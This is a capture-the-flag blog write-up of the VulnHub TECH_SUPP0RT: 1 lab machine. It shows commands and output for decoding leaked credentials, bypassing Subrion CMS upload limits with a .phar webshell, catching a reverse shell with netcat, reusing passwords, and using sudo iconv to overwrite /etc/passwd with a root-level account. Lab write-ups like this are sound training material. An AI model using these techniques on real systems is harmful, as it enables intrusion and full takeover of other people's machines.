---
layout: post
title:  "Vulnhub: TECH_SUPP0RT: 1"
date:   2021-06-19 21:00:00 +1000
category: hacking
---

## TECH_SUPP0RT: 1
This is [TECH_SUPP0RT: 1](https://www.vulnhub.com/entry/tech_supp0rt-1,708/) from VulnHub. 

>Difficulty: Easy  
Background: The machine acts as a server setup by pop-up scammers which is under maintenance.

Let's go.

## Ports
HTTP, SSH and SMB. Let's begin with SMB.

## SMB
We have anonymous login (I use smbclient) and just one file: *enter.txt*.

{% highlight shell %}
┌──(root💀kali)-[/opt/vulnhub/tech_support]
└─# cat enter.txt                                                                       
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
{% endhighlight %}

So, this implies we have a wordpress installation, and something called subrion which I've never heard of. Heading over to CyberChef with our obfuscated credentials and clicking **magic** gives:

>From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)  
From_Base32('A-Z2-7=',false)  
From_Base64('A-Za-z0-9+/=',true)  
Scam2021	Matching ops: From Base64  
Valid UTF8  
Entropy: 2  

So that's our password for *subrion* (Scam2021).

Now, this is where I had some trouble. The box came in as a VMDK which I don't hate but they never tell you which OS it is. Anyway it's Ubuntu and I set it up, but it was set to NAT. I switched it to Bridged, because that's how I run my Kali and it started to work but then trying to go to *subrion* it kept redirecting to a NAT IP address. Bugger; I've had this before and it makes it pretty much impossible to continue.

I shut everything down, took a snapshot of my Kali and restarted it in NAT mode, then restarted the box; it worked! This was actually a first for me. But we can continue.

## Subrion
We can login easily; it's a CMS. I poke around and upload a webshell but it's only got read and write permission; no execute. Navigating to the file says 'you can't do that' or something along those lines. Now what?

There is an [exploit](https://www.exploit-db.com/exploits/49876). Reading through the code, it appears that **phar** files can be executed, but not other types. Rather than running the exploit script I use the GUI to rename my shell from *shell.php* to *shell.phar* and then visit http://10.0.2.15/subrion/uploads/shell.phar; success!

{% highlight shell %}
┌──(root💀kali)-[/opt/vulnhub/tech_support]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.0.2.5] from (UNKNOWN) [10.0.2.15] 49774
Linux TechSupport 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 16:17:49 up 13 min,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@TechSupport:/$
{% endhighlight %}

## Support
We know there is a Wordpress site so I go to /var/www/html/wordpress/ and check wp-config.php for creds:

{% highlight shell %}
# snip
/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'ImAScammerLOL!123!' );
# snip
{% endhighlight %}

This can be used to login to mysql, but it's alse reused for our next user, whose name we get from /etc/passwd:

{% highlight shell %}
www-data@TechSupport:/var/www/html/wordpress$ su scamsite
su scamsite
Password: ImAScammerLOL!123!

scamsite@TechSupport:/var/www/html/wordpress$ sudo -l
sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
scamsite@TechSupport:
{% endhighlight %}

So; according to [GTFOBins](https://gtfobins.github.io/gtfobins/iconv/) we can read and write files with iconv, but there is one catch. The example given for writing files is:

```
LFILE=file_to_write  
echo "DATA" | iconv -f 8859_1 -t 8859_1 -o "$LFILE"
```

Where the call to iconv is not the first thing. I usually find with these sudo things that this won't work; the iconv call needs to be first. Anyway, I can read /etc/shadow and grab the root hash with this; that's okay but it probably won't break easily (I don't try for long). What about SSH? Yes, there is a root SSH key at /root/.ssh/id_rsa and we can read that. However, even though the key is not encrypted, we can't login with it. Every time I try, I am prompted for a password - presumably something is not right in the server configuration.

{% highlight shell %}
┌──(root💀kali)-[/opt/vulnhub/tech_support]
└─# scp -i id_rsa root@10.0.2.15:/etc/shadow shadow                                     
root@10.0.2.15's password: 
Permission denied, please try again.
{% endhighlight %}

Debug mode doesn't help, and even reading /var/log/auth.log with the iconv trick doesn't help:

{% highlight shell %}
Jun 19 16:30:14 TechSupport sudo: scamsite : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/iconv -f 8859_1 -t 8859_1 /var/log/auth.log
Jun 19 16:30:14 TechSupport sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
Jun 19 16:30:14 TechSupport sudo: pam_unix(sudo:session): session closed for user root
Jun 19 16:30:46 TechSupport sshd[2035]: Connection closed by 10.0.2.5 port 37610 [preauth]
{% endhighlight %}

Now what? Well, we can use iconv for a file write by modifying the GTFOBins code a little. I want to add the line:

```
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash
```

to /etc/passwd. I make a copy of /etc/passwd to /dev/shm/backup and then append the line in:

```
printf "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash\n" >> /dev/shm/backup
```

And then I can use inconv to replace /etc/passwd with the modified version using redirection:

{% highlight shell %}
scamsite@TechSupport:/$ LFILE=/etc/passwd
LFILE=/etc/passwd
scamsite@TechSupport:/$ sudo -u root /usr/bin/iconv -f 8859_1 -t 8859_1 -o "$LFILE" < /dev/shm/backup
scamsite@TechSupport:/$ su root2
su root2
Password: mrcake

root@TechSupport:/# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
TechSupport
Sat Jun 19 16:39:13 IST 2021
root@TechSupport:
root@TechSupport:~# cat root.txt
cat root.txt
851b8233a8c09400ec30651bd1529bf1ed02790b  -
{% endhighlight %}

So; a few challenges along the way but we got there in the end. Huzzah!
